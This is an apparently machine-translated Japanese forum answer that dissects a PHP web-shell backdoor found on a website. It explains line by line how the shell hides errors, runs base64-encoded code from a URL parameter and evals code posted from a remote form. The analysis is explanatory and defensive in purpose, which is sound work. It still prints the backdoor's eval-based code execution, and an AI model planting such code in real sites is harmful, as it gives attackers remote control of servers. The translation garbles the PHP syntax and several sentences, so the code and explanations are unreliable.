大きな問題は、攻撃者が最初にファイルをどのようにアップロードできるかということです。そのファイルには、攻撃者が無断でサーバー上でコードを実行できるように挿入されたコードがあります。
このファイルと不正なコードを含む他のファイルを削除するだけでは問題が解決されないため、攻撃者はファイルをWebサイトのファイルリポジトリにアップロードできます。いずれにしても
は、ここで完全な破壊である:
1 /のerror_reporting(0)。 エラー報告をオフに設定します。
2/if(@ $ _ GET ['wpth']){echo "./mywebsite.co.uk/index.htm"; }?> 最後に/?wpthを付けてURLを呼び出すと、ページの上部にURLがエコーされます。
3/ これは、qの値に含まれるすべてのコードを実行します。すなわちyourdomain.com/?q=base64_decode(%27somelongstringhere%27)
4 /(ISSET($ _ POST [ 'のeval']!))であれば{ダイス( '');} キルページの実行の場合evalと呼ばれるポストフォーム変数は設定されません。
5/eval($ _ POST ['eval']); フォーム変数がeval
と呼ばれる、リモートホストされたフォームから転記されたコードを実行します(追加アップロードなしで、明らかにすでに可能なこともあります)。 – mario